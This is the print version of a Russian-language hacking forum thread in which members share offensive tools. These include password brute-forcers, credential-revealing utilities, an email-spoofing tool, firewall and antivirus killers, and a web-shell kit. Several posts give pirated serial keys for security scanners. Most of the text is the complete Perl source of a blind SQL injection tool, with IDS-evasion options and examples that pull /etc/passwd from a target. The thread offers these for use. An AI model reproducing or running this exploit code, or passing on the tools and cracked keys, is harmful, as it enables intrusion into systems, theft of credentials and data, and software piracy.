Версия для печати темы
MADALF FORUM _ SOFT & WAREZ _ Хак Soft
Автор: Spidey 21.08.2003, 15:55
http://www.hackdocs.host.kz/soft/brutus.zip ( 337 kb - windows ) - программа для перебора паролий к pop, ftp и многое другое.
http://www.hackdocs.host.kz/soft/UIN_PASS_v1.4.zip ( 276 kb - windows ) - отличная программа для генерирования листов типа uin;pass для последующего использования этих листов в IPDbrute и подобных программах.
http://www.hackdocs.host.kz/soft/openpass.rar (80 kb)- Сборник, программ который состоит из 5 программ для открытия паролей закрытых все теме же звездочками.
Автор: Spidey 22.08.2003, 12:51
http://www.antichat.ru/soft/words.zip (uknown)- Сборник слов для брутуса.
Автор: o][yd 14.11.2003, 22:39
http://ifud.ru/ipd/IPDbrute2udc2Pro.rar
Проводит брутфорс по веденному номеру ICQ
Поддерживает списки HTTPS проксей (метод CONNECT)
Многопоточный / через протокол ICQv8
Поддержка паролей в HEX (0x0d, 0x0a, и т. д.)
Поддерживает листы UIN’ов на проверку...
Удаляет неработающие прокси
Запуску из командной строки – просто ведите "IPDbrute2.exe autostar
Автор: trojanec 1.12.2003, 02:06
Новая демо версия XSpider 7
http://www.ptsecurity.ru/xs7download.asp
Автор: [xaos] 28.03.2004, 12:38
Цитата
LANguard Network Security Scanner 3.0
Users: No limitations s/n: 123FF-CMETN-12131-DHJY2-15161 Users: 25 s/n: 12319-CMETN-12131-DHJLF-15161 Users: 50 s/n: 12332-CMETN-12131-DHJEM-15161 Users: 100 s/n: 12364-CMETN-12131-DHJGK-15161 Users: 250 s/n: 123FA-CMETN-12131-DHJT7-15161
Цитата
LANguard Network Security Scanner 3.1.3
s/n: 116FF-FB0BE-28412-6I0XZ-33201-03403-05799-07777
Цитата
LANguard Network Security Scanner 3.0.0.422
s/n: 292FF-ELKDI-29205-EL8ZZ-29205
Цитата
LANguard Network Security Scanner 3.3 Build 20030709
SN: 117FF-FC0GD-23562-6EHXZ-32750-09602-04259-05773
SN: 106FF-FBLGD-24371-6FIXZ-31950-07044-02234-05998
SN: 104FF-F7VHD-24371-6BOXZ-35760-01746-08573-06067
Цитата
LANguard Network Security Scanner v3.3
Name: www.appzplanet.com
Serial: 183FF-FK4FL-21857-6DCXZ-38448-01068-04281-04118
Цитата
Languard Network Security Scanner v3.3 DATECODE 20040204
0NAFF-108TL-16J54-KC2XZ-CTMB8-UNiTED-CRACKiNG-FORCE-190666
or
QE5FF-RH071-S1OUH-FQHXZ-C8CPH-UNiTED-CRACKiNG-FORCE-190666
Автор: Spidey 29.03.2004, 11:41
http://www.madalf.ru/cgi-bin/stetchik/bsdcc.pl?19 ( 375 kb - windows ) - Всем поможет. Программа для востановления утерянных паролей. Короче поможет.
Автор: anechka_19 12.04.2004, 23:02
http://mirror1.safety-lab.com/SSS.exe кряк на асталависте..
http://www.freeproxy.ru/download/socks_checker.exe там же куча других прожек для работы с проксями
http://www.insidepro.com/download/passwordspro.zip Вообщем подбор MD5 и по словарю и брутофорсом и по маске. Так же еще и MD4 и показывает пароли скрытые звездочками.. но это не интересно.
Нравицца еще програмка Xavior Beta7 - подбор паролей через веб.. куча настроек. Она есть на этом сайте. В разделе soft.
Автор: anechka_19 12.04.2004, 23:13
Ах вот еще интересная програмка
http://msender.chat.ru/mailsender.zip через нее можно отсылать мэйлы от чужого ящика и попортить немало нервов владельцу этого самого ящика и заставить его судорожно менять пароли
) Только она каким то не особо вредным вирусняком заражена.. Кто предупрежден - тот вооружен.
Вообще-то подмену можно и через telnet устроить. Кому как нравицца.
Автор: cannabis 16.04.2004, 06:12

Check Proxy Professional has the following features:
- Managing / checking HTTP proxy lists;
- Proxy list printing;
- Proxy anonymity level detection;
- Determines type of the proxy server (Anonymous/Transparent);
- Determines speed of the proxy server;
- Determines Location (country) of the proxy server;
- Recognize different formats of proxy list (separated by colon, spaces, tabs, etc.);
- Proxy finder (Proxy Hunter);
- Supports multi-threading (can check many proxies simultaneously);
- Daily updates of the database.
http://www.checkproxy.com/downloads/d2/CheckpPro-HTTP-Demo-4.00-500.EXE
очен нужная вешч!
Автор: cannabis 22.04.2004, 06:02
http://www.wolfgang-brinkmann.de/BartPE/cain.cab
Сain&Abel
Автор: Iskr 25.09.2004, 20:03
Вот прога для того чтобы патчить файлы склеенные с троем, как правило Антивирь его после етого не видит...
Никто не поможет найти новую версию и крякк ней???
Автор: NADZIRATEL 25.09.2004, 20:06
кряк конечно поможем!
http://crackspider.net/search.shtml?q=pe_patcher&x=18&y=9
Автор: Str@nNIK 10.10.2004, 03:25
кому там надо было обойти или убить огненную стену? )))Держите.
к сожалению с лекарством беда- не успел найти ((
Автор: Str@nNIK 10.10.2004, 03:33
да и ще такойвот нюк,все по той же теме:
Новый нюкер для Windows. Быстрый и маленький, с возможностью
остановить в нужный момент, с возможностью подмены IP адреса и
контролем ошибок...
Автор: Str@nNIK 10.10.2004, 03:38
Sorri ne to )))) A vot to:Программа убивает на машине пользователя firewall? и антивирусы, выбранные приложения.
Автор: Micro 5.11.2004, 23:04
А http://www.nirsoft.net/utils/pspv.zip (30 кб) «восстанавливает» информацию автозаполнения и Protected Storage (пароли для доступа к FTP-серверам и других мест) в IE и MSN Explorer (логин/пароль), пароли от POP3 аккаунтов Outlook Express.

Точно также всю необходимую информацию можно копировать буфер или сохранять в файл в текстовых и html форматах
Автор: Swen47 14.11.2004, 09:06
Mail PassView
Прога позволяет посмотреть пасс для почтовых программ.
Непроверял из-за отсутствия таковых.
Автор: Micro 15.11.2004, 22:04
http://www.nirsoft.net/utils/iecv.zip (95 кб) служит для просмотра детальной информации о куках (поддерживается только IE). Можно сортировать все куки по люой колонке, находить нужное путем указания имени сайта, удалять нежелательные, сохранять в обычный текстовый файл, копировать информацию в буфер, просматривать куки других пользователей (если есть доступ), изменять содержимое и т.д.
Автор: Swen47 16.11.2004, 16:58
http://bmerussia.com/0day/SmartWhois3.6.exe
Автор: bdrFsg 22.11.2004, 17:48
Blue`s Port Scanner 5.0.2 - megaspeed!http://www.xakep.ru
IP Tools 2.20 рулеззhttp://www.xakep.ru
Putty - не помешает!
Автор: jur15t 29.01.2005, 16:16
может надо кому...
http://secondarytester.narod.ru/new/NScan.exe
Автор: CMEP4 23.02.2005, 22:46
универсальный сканер из 15 инструментов.
очень жаль что не поддерживает udp
для регистрации
name rth77!
code A9D206B673EC72DB71A353CDC987788211B6C0BE09F366EF9E2B4E025CC25BA1609783C3E1AEDC66
5827927997FEFB0ED2253DB1DA23373A4221B0B455396FBDDD6AFFD1A0B73CA6D9BDA7107985903C
Автор: flax 30.08.2005, 12:21
Прога для распаковки некоторых PE Файлов. Иногда бывает очень полезна.
Автор: MisterGenady 8.12.2005, 12:49
wwwHack
Автор: MisterGenady 4.03.2006, 19:53
Порты Троянских Прог
Автор: DeathMan 6.06.2006, 23:18
Цитата(forb @ 6.06.2006, 22:11)
А чего ни одного линка на закачку? И программа WWWHack, насколько я помню, для получения http форм сайта, а не для взлома паролей...хотя могу ошибаться!

ссылка http://www.wwwhack.com/
Автор: Creeping Death 14.08.2006, 01:10
ArabianAttacker (WHTK) 1.0
Download it from here :
http://www.tm-world.net/ArabianAttacker/Download/ArabianAttacker-(WHTK).zip
Shell's inside :
c99
c99edited
r57-en
r57-ru
r57-ar
DX-Shell
RemView
WebAdmin
My-Shell
other files :
netcat
mswi (MySQL-Web-Interface)
cgi-telnet
e-mailLlistMackeR
IP-Logger
backdoor
Автор: LEVIAFAN 19.08.2006, 12:18
Cain & Abel v2.7.5 for Windows NT/2000/XP
http://www.oxid.it/downloads/ca_setup.exe
Автор: Creeping Death 18.09.2006, 16:03
NST Simple HTTP Scanner
is a tool programmed in C to find vulnerabilities on remote web servers by looking for files and directories.
The version 0.4 was released. In this version i implemented the POSIX threads (pthread). This way, the scanning its much more faster. Compiling the scanner with pthreads under a Windows plataform it's not easy at all. Here you have a link with the pthread-win32lib files and a readme file with all the instructions to make the scan work with the library (pthread-win32lib was tested under Windows XP SP2 compiling with the IDE Dev-C++ 4.9.9.2):
In the readme file of the scanner you can see how to compile the scanner under Linux (with GCC, adding the -lpthread for link the library) and under Windows.
New skills
- Security bugs fixed
- HTML Report improved
- New feature: subdomains scanning
- New feature: option -u for updates check
- New feature: use of POSIX threads (the scanner is much more faster)
- Default requests.txt improved
http://www.neosecurityteam.net/download.php?id=32
http://www.neosecurityteam.net/tools/sHTTP...canner_v0.4.exe
http://www.neosecurityteam.net/tools/sHTTP...canner_v0.4.bin
http://sourceforge.net/projects/shttpscanner/
Автор: Valter 27.09.2006, 02:00
http://www.cracklab.ru/download.php?action=get&n=MTU= Наверное самый лучший шестнадцатиричный редактор. Позволет редактировать файлы, память, диски, отображение адресации в HEX и десятичном формате, отображает значения, как байты, слова, двойные слова. Может конвертировать информацию (прибавлять, модифицировать по XOR). Может выдать исходники массива на паскале или си. Может производить автозамену по шестнадцатиричным значениям и по строкам. В общем, он лучший ! Хотя и не новинка для народа! 
И ешо куча всякой хакерской всячины с этого сайта http://www.cracklab.ru/
Автор: Creeping Death 15.10.2006, 01:08
BitWise IM Personal 1.7.2
BitWise IM – IM клиент прямого общения и программа голосового чата, которая шифрует все сообщения и передаваемые данные.
BitWise IM работает с минимальным взаимодействием с сервером и позволяет работать в “безсерверном” режиме с поддержкой текстовых макросов, оффлайн сообщений, форвард на email, невидимый режим и многое другое. BitWise IM позволяет передавать файлы и содержит Web интерфейс для отправки сообщения и проверки оффлайн сообщений с любого компьютера, используя только Web браузер.
http://www.bitwiseim.com
Автор: [fR4g] 22.12.2006, 12:31
TrueCrypt v4.2a
Прога для шифрования дисков / создания зашифрованных образов.
Удобно делать зашифрованные флешки.
OpenSource, FreeWare. Засим есть шансы, что нет лазеек для того, кто очень попросит.
PS: Позволяет внутри существующего тома делать второй скрытый.
http://www.truecrypt.org/downloads.php
маст хэв.
Автор: self 28.12.2006, 13:08
tia, аналог :
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.
Автор: Creeping Death 12.01.2007, 12:52
bsqlbfv1.2
скрипт для подбора запросов при слепой SQL-Injection
CODE
#!/usr/bin/perl
# Blind SQL Injection POC. aramosf@514.es // http://www.514.es
#
# CHANGELOG:
# Tue Jul 13 10:14:19 RST 2006
# + threads support. for hungry hackers.
# Wed Jul 12 14:04:33 RST 2006
# + change sql teqneez mcdonalds powah 8) (more than 40% optimization)
# please, rip me!!, make your own paper!! =]
# + support for windows files (for example: C:\\boot.ini)
# + support for " and 1="1 sql injection
# + -binary and -ascii support
# - -charset option removed
# - -dict option removed
# + upgrade to v1.2
# Sat Apr 1 03:13:01 CEST 2006
# + -get now support resume (with -start option)
# Thu Mar 30 02:06:41 CEST 2006
# -get to fetch files (thank you ilo AGAIN)
# ***** RELIABLE SPEED IMPROVEMENT USING SOME SKILLS OF SQL AND BRAIN!!***
# Sat Mar 25 13:57:39 CET 2006
# Release `haqerz edition` of bsqlbf:
# + -time option added (IDS bypass)
# + -rtime option added (IDS bypass)
# + -rproxy option added (IDS bypass)
# + -ruagent option added (IDS bypass)
# Sun Dec 11 11:01:34 CET 2005
# + fixed automatch in POSTs
# + better output
# Mon Dec 5 18:30:03 CET 2005
# + added -blind option (to specify which attribute have sql injection).
# Tue Nov 29 17:31:54 CET 2005
# + auto search match string (when they arent -match option)
# Mon Nov 28 16:34:09 CET 2005
# + Support for POST and GET methods (-method get // -method post).
# + Cookies support (-cookie "blah=foo; moo=doo").
# + UserAgent support (-uagent "SQL Blind tool").
# Wed Nov 23 23:44:23 RST 2005
# First version 0.1:
# + code ripped from www.reversing.org <ilo[at]reversing.org> (thanks!)
#
#
# TODO:
# [ ] Rip more code from others.
use LWP::UserAgent;
use Getopt::Long;
use IO::Handle;
use strict;
use threads;
use threads::shared;
use Time::HiRes qw( usleep);
$| = 1;
###############################################################################
my $default_debug = 0;
my $default_length = 32;
my $default_method = "GET";
my $default_time = 0;
my $version = "1.2";
my $default_useragent = "bsqlbf $version";
my $default_sql = "version()";
###############################################################################
$| = 1;
my ($args, $solution);
my (%vars, @varsb);
my ($lastvar, $lastval);
my ($scheme, $authority, $path, $query, $fragment);
my ($head, $tail, $high);
my $hits = 0;
my $amatch = 0;
my ($ua,$req);
my $furl;
###############################################################################
# Define GetOpt:
my ($url, $sql, $time, $rtime, $match, $uagent, $debug);
my ($proxy, $proxy_user, $proxy_pass,$rproxy, $ruagent);
my ($start, $length, $method, $cookie, $blind);
my ($help, $get);
my ($ascii, $binary);
my $options = GetOptions (
'help!' => \$help,
'url=s' => \$url,
'get=s' => \$get,
'sql=s' => \$sql,
'blind=s' => \$blind,
'match=s' => \$match,
'start=s' => \$start,
'length=s' => \$length,
'method=s' => \$method,
'uagent=s' => \$uagent,
'ruagent=s' => \$ruagent,
'cookie=s' => \$cookie,
'proxy=s' => \$proxy,
'proxy_user=s' => \$proxy_user,
'proxy_pass=s' => \$proxy_pass,
'rproxy=s' => \$rproxy,
'debug!' => \$debug,
'binary!' =>\$binary,
'ascii!' => \$ascii,
'rtime=s' => \$rtime,
'time=i' => \$time );
&help unless ($url);
&help if $help eq 1;
#########################################################################
# Default Options.
$uagent ||= $default_useragent;
$debug ||= $default_debug;
$length ||= $default_length;
$solution ||= $start;
$method ||= $default_method;
$sql ||= $default_sql;
$time ||= $default_time;
&createlwp();
&parseurl();
if ( ! defined($blind)) {
$lastvar = $varsb[$#varsb];
$lastval = $vars{$lastvar};
} else {
$lastvar = $blind;
$lastval = $vars{$blind};
}
if (defined($cookie)) { &cookie() }
if (!$match) {
print "\nTrying to find a match string...\n" if $debug == 1;
$amatch = "1";
$match = fmatch("$url"," AND 1=");
if ($match eq "no vulnerable") {
print "\nNo vuln: 2nd..\n" if $debug ==1;
$match = fmatch("$url","\" AND 1=\"");
$head = "\"";
$tail = " AND 1=\"1";
};
if ($match eq "no vulnerable") {
print "Not vulnerable or use -blind\n";
exit 0;
}
}
&banner();
&httpintro();
( ! $get) ? sqlget() : fileget();
my @byte = ();
my $wait_me;
sub getbyte {
my $sql = $_[0];
my $bit="";
my @thread_count = ();
my $c = 8;
my $i = 0;
$high = 128 unless $ascii;#) ? 128 : { 64; $byte[0] = 0; };
$wait_me = 0;
share($wait_me);
share (@byte);
if ($ascii) {
$byte[0] = 0;
$high = 64;
}
for ($bit=1;$bit<=$high;$bit*=2) {
# launch thread ->
$thread_count[$i] = threads->create(\&launch_thread ,$sql, $bit, $c);
$thread_count[$i]->detach;
$c--;
}
while ($wait_me <= 7) {
usleep(50);
#sleep(1);# if !$dontsleep;
}
my $str = join("",@byte);
#print "\nSTR: $str\n";
return pack("B*","$str");
}
sub launch_thread {
my ($sql, $bit, $c) = @_;
my $val = "$head and (ord($sql) %26 $bit)=0 $tail";
#print "VAL[$c] $val\n";
if (lc($method) eq "post") {
$vars{$lastvar} = $lastval . $val;
}
$furl = $url;
$furl =~ s/($lastvar=$lastval)/$1$val/;
&createlwp if $rproxy || $ruagent;
my $html=fetch("$furl");
$hits++;
foreach (split(/\n/,$html)) {
lock @byte;
if (/\Q$match\E/) {
$byte[$c]=0;
last;
} else { $byte[$c] = 1; }
}
lock $wait_me;
threads->yield();
$wait_me++;
}
sub sqlget {
my ($fsize,$i,$s);
$s = "mid(length(length($sql)),1,1)";
my $lng .= getbyte($s);
for ($i=1;$i<=$lng;$i++) {
$s = "mid(length($sql),$i,1)";
$fsize.=getbyte($s);
}
#print "FSIZE: $fsize\n";
$length = $fsize. "bytes";
&bsqlintro();
my $rsize = $start + 1;
for ($i=$rsize;$i<=$fsize+1;$i++) {
$s = "mid($sql,$i,1)";
#print "S: $s\n";
my $byte = getbyte($s);
$solution .= $byte;
print $byte;
}
}
sub fileget {
my ($lget,$fstr);
if ($get =~ m/.*\/(.*)/) {
$lget = $1; }
$fstr = "0x".unpack("H*","$get");
if ($get =~ m/.*\\(.*)/) {
$lget = $1;
$fstr = "\"$get\"";
}
my $rsize = $start + 1;
if (-e "$lget" && ! $start) {
$rsize = -s "$lget";
print "Error: file ./$lget exists.\n";
print "You can erase or resume it with: -start $rsize\n";
exit 1
}
my ($i,$fsize);
$sql = "mid(length(length(load_file($fstr))),1,1)";
my $lng .= getbyte($sql);
for ($i=1;$i<=$lng;$i++) {
my $find = 0;
$sql = "mid(length(load_file($fstr)),$i,1)";
$fsize.=getbyte($sql);
}
if ($fsize < "1") { print "Error: file not found, no permissions or ... who knows\n"; exit 1 }
$length = $fsize. "bytes";
# starting ..
$sql = "load_file($get)";
&bsqlintro();
# Get file
#print "---> $lget";
open FILE, ">>$lget";
FILE->autoflush(1);
print "\n--- BEGIN ---\n";
my ($i,$b,$fcontent);
$rsize = 1 if $rsize < 1;
for ($i=$rsize;$i<=$fsize+1;$i++) {
my $find = 0;
my ($furl, $b_start, $b_end, $z);
$sql = "mid(load_file($fstr),$i,1)";
$fcontent=getbyte($sql);
print $fcontent;
print FILE "$fcontent";
}
print "\n--- END ---\n";
close FILE;
$solution = "success";
$sql = "$get";
}
&result();
#########################################################################
sub httpintro {
my ($strcookie, $strproxy, $struagent, $strtime, $i);
print "--[ http options ]"; print "-"x62; print "\n";
printf ("%12s %-8s %11s %-20s\n","schema:",$scheme,"host:",$authority);
if ($ruagent) { $struagent="rnd.file:$ruagent" } else { $struagent = $uagent }
printf ("%12s %-8s %11s %-20s\n","method:",uc($method),"useragent:",$struagent);
printf ("%12s %-50s\n","path:", $path);
foreach (keys %vars) {
$i++;
printf ("%12s %-15s = %-40s\n","arg[$i]:",$_,$vars{$_});
}
if (! $cookie) { $strcookie="(null)" } else { $strcookie = $cookie; }
printf ("%12s %-50s\n","cookies:",$strcookie);
if (! $proxy && !$rproxy) { $strproxy="(null)" } else { $strproxy = $proxy; }
if ($rproxy) { $strproxy = "rnd.file:$rproxy" }
printf ("%12s %-50s\n","proxy_host:",$strproxy);
if (! $proxy_user) { $strproxy="(null)" } else { $strproxy = $proxy_user; }
# timing
if (! $time && !$rtime) { $strtime="0sec (default)" }
if ( $time == 0) { $strtime="0 sec (default)" }
if ( $time == 1) { $strtime="15 secs" }
if ( $time == 2) { $strtime="5 mins" }
if ($rtime) { $strtime = "rnd.time:$rtime" }
printf ("%12s %-50s\n","time:",$strtime);
}
sub bsqlintro {
my ($strstart, $strblind, $strlen, $strmatch, $strsql);
print "\n--[ blind sql injection options ]"; print "-"x47; print "\n";
if (! $start) { $strstart = "(null)"; } else { $strstart = $start; }
if (! $blind) { $strblind = "(last) $lastvar"; } else { $strblind = $blind; }
printf ("%12s %-15s %11s %-20s\n","blind:",$strblind,"start:",$strstart);
if ($length eq $default_length) { $strlen = "$length (default)" } else { $strlen = $length; }
if ($sql eq $default_sql) { $strsql = "$sql (default)"; } else { $strsql = $sql; }
printf ("%12s %-15s %11s %-20s\n","length:",$strlen,"sql:",$strsql);
if ($amatch eq 1) { $strmatch = "auto match:" } else { $strmatch = "match:"; }
#printf ("%12s %-60s\n","$strmatch",$match);
print " $strmatch $match\n";
print "-"x80; print "\n\n";
}
#########################################################################
sub createlwp {
my $proxyc;
&getproxy;
&getuagent if $ruagent;
LWP::Debug::level('+') if $debug gt 3;
$ua = new LWP::UserAgent(
cookie_jar=> { file => "$$.cookie" });
$ua->agent("$uagent");
if (defined($proxy_user) && defined($proxy_pass)) {
my ($pscheme, $pauthority, $ppath, $pquery, $pfragment) =
$proxy =~ m|^(?:([^:/?#]+)

?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|;
$proxyc = $pscheme."://".$proxy_user.":".$proxy_pass."@".$pauthority;
} else { $proxyc = $proxy; }
$ua->proxy(['http'] => $proxyc) if $proxy;
undef $proxy if $rproxy;
undef $uagent if $ruagent;
}
sub cookie {
# Cookies check
if ($cookie || $cookie =~ /; /) {
foreach my $c (split /;/, $cookie) {
my ($a,$b) = split /=/, $c;
if ( ! $a || ! $b ) { die "Wrong cookie value. Use -h for help\n"; }
}
}
}
sub parseurl {
###############################################################################
# Official Regexp to parse URI. Thank you somebody.
($scheme, $authority, $path, $query, $fragment) =
$url =~ m|^(?:([^:/?#]+)

?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|;
# Parse args of URI into %vars and @varsb.
foreach my $varval (split /&/, $query) {
my ($var, $val) = split /=/, $varval;
$vars{$var} = $val;
push(@varsb, $var);
}
}
#########################################################################
# Show options at running:
sub banner {
print "\n // Blind SQL injection brute force.\n";
print " // aramosf\@514.es / http://www.514.es\n\n";
}
#########################################################################
# Get differences in HTML
sub fmatch {
my ($ok,$rtrn);
my ($furla, $furlb,$quote) = ($_[0], $_[0],$_[1]);
my ($html_a, $html_b);
if (lc($method) eq "get") {
$furla =~ s/($lastvar=$lastval)/$1 ${quote}1/;
$furlb =~ s/($lastvar=$lastval)/$1 ${quote}0/;
$html_a = fetch("$furla");
$html_b = fetch("$furlb");
} elsif (lc($method) eq "post") {
$vars{$lastvar} = $lastval . " ${quote}1";
$html_a = fetch("$furla");
$vars{$lastvar} = $lastval . " ${quote}0";
$html_b = fetch("$furla");
$vars{$lastvar} = $lastval;
}
#print "$html_a";
#print "$html_b";
if ($html_a eq $html_b) {
$rtrn = "no vulnerable";
return $rtrn;
}
my @h_a = split(/\n/,$html_a);
my @h_b = split(/\n/,$html_b);
foreach my $a (@h_a) {
$ok = 0;
if ($a =~ /\w/) {
foreach (@h_b) {
if ($a eq $_) {$ok = 1; }
}
} else { $ok = 1; }
$rtrn = $a;
last if $ok ne 1;
}
return $rtrn;
}
#########################################################################
# Fetch HTML from WWW
sub fetch {
print "fetch: $_[0]\n";
my $secs;
if ($time == 0) { $secs = 0 }
elsif ($time == 1) { $secs = 15 }
elsif ($time == 2) { $secs = 300 }
if ($rtime =~ /\d*-\d*/ && $time == 0) {
my ($l,$p) = $rtime =~ m/(\d+-\d+)/;
srand; $secs = int(rand($p-$l+1))+$l;
} elsif ($rtime =~ /\d*-\d*/ && $time != 0) {
print "You can't run with -time and -rtime. See -help.\n";
exit 1;
}
sleep $secs;
my $res;
if (lc($method) eq "get") {
my $fetch = $_[0];
if ($cookie) {
$res = $ua->get("$fetch", Cookie => "$cookie");
} elsif (!$cookie) {
$res = $ua->get("$fetch");
}
} elsif (lc($method) eq "post") {
my($s, $a, $p, $q, $f) =
$url=~m|^(?:([^:/?#]+)

?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|;
my $fetch = "$s://$a".$p;
if ($cookie) {
$res = $ua->post("$fetch",\%vars, Cookie => "$cookie");
} elsif (!$cookie) {
$res = $ua->post("$fetch",\%vars);
}
} else {
die "Wrong httpd method. Use -h for help\n";
}
my $html = $res->content();
return $html;
}
sub getproxy {
if ($rproxy && $proxy !~ /http/) {
my @lproxy;
open PROXY, $rproxy or die "Can't open file: $rproxy\n";
while(<PROXY>) { push(@lproxy,$_) if ! /^#/ }
close PROXY;
srand; my $ind = rand @lproxy;
$proxy = $lproxy[$ind];
} elsif ($rproxy && $proxy =~ /http/) {
print "You can't run with -proxy and -rproxy. See -help.\n";
exit 1;
}
}
sub getuagent {
my @uproxy;
open UAGENT, $ruagent or die "Can't open file: $ruagent\n";
while(<UAGENT>) { push(@uproxy,$_) if ! /^#/ }
close UAGENT;
srand; my $ind = rand @uproxy;
$uagent = $uproxy[$ind];
chop($uagent);
}
sub result {
print "\r results: \n" .
" $sql = $solution\n" if length($solution) > 0;
print " total hits: $hits\n";
}
sub help {
&banner();
print " usage: $0 <-url http://www.host.com/path/script.php?foo=bar> [options]\n";
print "\n options:\n";
print " -sql:\t\tvalid SQL syntax to get; connection_id(), database(),\n";
print "\t\tsystem_user(), session_user(), current_user(), last_insert_id(),\n";
print "\t\tuser() or all data available in the requested query, for\n";
print "\t\texample: user.password. Default: version()\n";
print " -blind:\tparameter to inject sql. Default is last value of url\n";
print " -match:\tstring to match in valid query, Default is try to get auto\n";
print " -start:\tif you know the beginning of the string, use it.\n";
print " -length:\tmaximum length of value. Default is $default_length.\n";
print " -time:\t\ttimer options:\n";
print " \t0:\tdont wait. Default option.\n";
print " \t1:\twait 15 seconds\n";
print " \t2:\twait 5 minutes\n";
print " -rtime:\twait random seconds, for example: \"10-20\".\n";
print " -method:\thttp method to use; get or post. Default is $default_method.\n";
print " -uagent:\thttp UserAgent header to use. Default is $default_useragent\n";
print " -ruagent:\tfile with random http UserAgent header to use.\n";
print " -cookie:\thttp cookie header to use\n";
print " -rproxy:\tuse random http proxy from file list.\n";
print " -proxy:\tuse proxy http. Syntax: -proxy=http://proxy:port/\n";
print " -proxy_user:\tproxy http user\n";
print " -proxy_pass:\tproxy http password\n";
print "\n examples:\n bash# $0 -url http://www.somehost.com/blah.php?u=5 -blind u -sql \"user()\"\n";
print " bash# $0 -url http://www.buggy.com/bug.php?r=514&p=3 -get \"/etc/passwd\"\n";
exit(1);
}
Автор: Creeping Death 18.01.2007, 01:51
SQL Injection TooL
Программа SQL Injection TooL предназначена для изучения БД через ошибки в программном коде веб-сайтов, а точнее она использует т.н. SQL-инъекции.
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как наберете 50 сообщений.
Автор: self 18.01.2007, 14:10
SAMInside 2.5.8.0
Описание программы
Восстановление паролей
Атака полным перебором:
Данный вид атаки представляет собой полный перебор всех возможных вариантов паролей.
Атака полным перебором также включает в себя атаку распределенным перебором. Данный вид атаки позволяет использовать для восстановления паролей несколько компьютеров, распределив между ними обрабатываемые пароли. Этот вид атаки включается автоматически, когда пользователь устанавливает количество компьютеров, участвующих в атаке, более одного. После этого становится доступной возможность выбора диапазона паролей для атаки на текущем компьютере. Таким образом, чтобы начать атаку распределенным перебором, вам необходимо:
Запустить программу на нескольких компьютерах.
Выбрать во всех экземплярах программы нужное количество компьютеров для атаки.
Установить одинаковые настройки для перебора на всех компьютерах.
Выбрать для каждого компьютера свой диапазон перебора паролей.
Запустить на каждом компьютере атаку полным перебором.
Атака по маске:
Данный вид атаки используется, если есть определенная информация о пароле. Например:
- Пароль начинается с комбинации символов "12345";
- Первые 4 символа пароля - цифры, остальные - латинские буквы;
- Пароль имеет длину 10 символов и в середине пароля есть сочетание букв "admin";
- И т.д.
Настройки перебора по маске позволяют сформировать маску для перебираемых паролей, а также установить максимальную длину перебираемых паролей. Установка маски заключается в следующем - если вы не знаете N-й символ пароля, то включите N-й флажок маски и в соответствующем текстовом поле укажите маску для этого символа. Если же вы заранее знаете определенный символ пароля, то впишите его в N-е текстовое поле и снимите флажок маски.
В программе используются следующие символы маски:
? - Любой печатаемый символ (ASCII-коды символов 32...255).
A - Любая заглавная латинская буква (A...Z).
a - Любая строчная латинская буква (a...z).
S - Любой специальный символ (!@#...).
N - Любая цифра (0...9).
1...8 - Любой символ из соответствующего пользовательского набора символов.
Атака по словарям:
Словарь - это текстовый файл, состоящий из часто употребляемых паролей типа
123
admin
master
и т.д.
Настройки атаки по словарям также включают и гибридную атаку, т.е. возможность добавлять к проверяемым паролям до 2 символов справа и слева, что позволяет восстанавливать такие пароли как "master12" или "#admin".
Атака по предварительно рассчитанным таблицам:
Данный вид атаки использует Rainbow-технологию (http://www.antsight.com/zsl/rainbowcrack/) для создания предварительно рассчитанных таблиц.
Дополнительно:
Для всех видов атак необходимо дополнительно указать - по каким хэшам (LM или NT) восстанавливать пароли.
Для атаки по словарям (в списке файлов словарей) и для атаки по Rainbow-таблицам (в списке файлов таблиц) необходимо отметить галочками те файлы, которые предполагается использовать в атаке.
Параметры командной строки
Программой можно управлять, используя следующие параметры командной строки:
-hidden : запуск программы в скрытом режиме;
-noreport : запрещает программе выдавать сообщения об окончании атаки;
-import : при загрузке программа сразу же выполнит автоматический импорт локальных пользователей;
-export : программа выполнит импорт локальных пользователей, сохранит результаты в файл SAMInside.OUT и завершит работу;
-minimize : запуск программы с минимизацией в трей.
Дополнительные возможности программы
Проверка пароля на всех пользователях, загруженных в программу.
Для этого в текстовом поле "Current password:" введите нужный пароль и нажмите F2. После этого программа проверит данный пароль на всех пользователях, пароль к которым еще не найден.
"Скрытый режим" работы программы (Ctrl+Alt+H).
При выборе этого режима программа исчезнет с экрана и с панели задач.
Для возврата из скрытого режима нажмите эту же комбинацию клавиш.
Также в архиве с программой находятся следующие консольные утилиты для работы с файлами реестра SAM и SYSTEM:
GetSyskey - программа извлекает из файла реестра SYSTEM системный ключ SYSKEY и сохраняет его в отдельный 16-байтовый файл.
GetHashes - программа извлекает хэши пользователей из файла реестра SAM, используя файл с ключом SYSKEY
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.
Автор: Creeping Death 20.01.2007, 13:04
RMOSChange
Программа изменяет HTTP заголовки Internet Explorer, Firefox, Mozilla,
так, что сервер(web-сайт), не сможет узнать какая у вас
установлена ОС, версия браузера и язык системы.
Избавляет от установки виртуальной машины.
конечно незабывем про proxy
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как наберете 50 сообщений.
Автор: Creeping Death 18.02.2007, 11:24
sqlmap
sqlmap is an automatic blind SQL injection tool, developed in python, capable of enumerating an entire remote database, performing an active database fingerprint and much more. The aim of this project is to implement a fully functional database mapper tool which takes advantages of web application programming security flaws which lead to SQL injection vulnerabilities.
Features
* Test of the remote url stability, based on page hash or string match;
* Identification of url dynamic parameters;
* Test numeric, string (single quote and double quotes) SQL injection on all url dynamic parameters and at first vulnerable it will be used to perform the future SQL injections;
* Possible selection of HTTP method for testing and exploiting dynamic parameters, GET or POST (default: GET);
* Fingerprint of web application database back-end based upon specific queries output which identify database characteristics and banner grabbing;
* Random HTTP User-Agent header selection;
* HTTP Cookie header provided, useful when web application requires authorization based on cookies and you an account;
* Provide an anonymous HTTP proxy address to pass by request to the target url;
